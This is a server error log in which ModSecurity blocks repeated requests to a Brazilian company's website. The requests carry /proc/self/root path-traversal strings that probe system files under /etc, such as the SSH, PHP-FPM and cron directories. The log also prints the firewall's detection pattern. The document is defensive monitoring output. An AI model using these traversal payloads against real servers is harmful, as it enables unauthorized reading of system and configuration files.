[Mon Mar 16 13:36:27.513826 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:39148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxi7ABkC4fWIHEf8HwtgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:36:28.892536 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:51854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxjLysWC90G-1nBrBJFgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:36:33.314994 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:51856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxkaTCbgAP5jq5TeguagAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:36:34.642128 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:51858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxkqTCbgAP5jq5TegubAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:37:03.085656 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.228.16:54462] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgxr7ABkC4fWIHEf8HwwQAAAEQ"]
[Mon Mar 16 13:37:27.255359 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:51868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgxx3jZBu2q05ozVU9dIgAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:39:14.729668 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:46392] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgyMrABkC4fWIHEf8HxPQAAAEI"]
[Mon Mar 16 13:40:36.397811 2026] [mime_magic:error] [pid 14895:tid 140411708356352] (70014)End of file found: [client 74.7.241.46:38468] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root
[Mon Mar 16 13:42:03.206869 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.228.16:54192] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgy23jZBu2q05ozVU9dSwAAAVc"]
[Mon Mar 16 13:42:15.975380 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:58926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy546lpbStxTqkSktxzAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:17.324763 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:55246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy6aTCbgAP5jq5TegvigAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:18.492920 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:57982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy6rABkC4fWIHEf8HxaAAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:21.940214 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:57992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy7bABkC4fWIHEf8HxawAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:24.311583 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:57996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy8FajLEzk2WiQ-10XAwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:25.561601 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:58006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy8Zqj1wV0Si-Okef0gAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:34.728004 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:58012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgy-lajLEzk2WiQ-10XDgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:40.635875 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:60800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzAHjZBu2q05ozVU9dVAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:42:52.792163 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:57128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzDNSswJuvopo3lOhkFQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:43:43.543482 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:60788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzP6TCbgAP5jq5TegvxwAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:45:21.951539 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:45552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzoaTCbgAP5jq5TegwLAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:45:25.095817 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:51558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzpbABkC4fWIHEf8HyOgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:45:51.588139 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:45750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzv3jZBu2q05ozVU9dsQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:45:54.211383 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.243.203:52126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzwlajLEzk2WiQ-10XLQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:45:56.795529 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:52128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgzxFajLEzk2WiQ-10XMAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
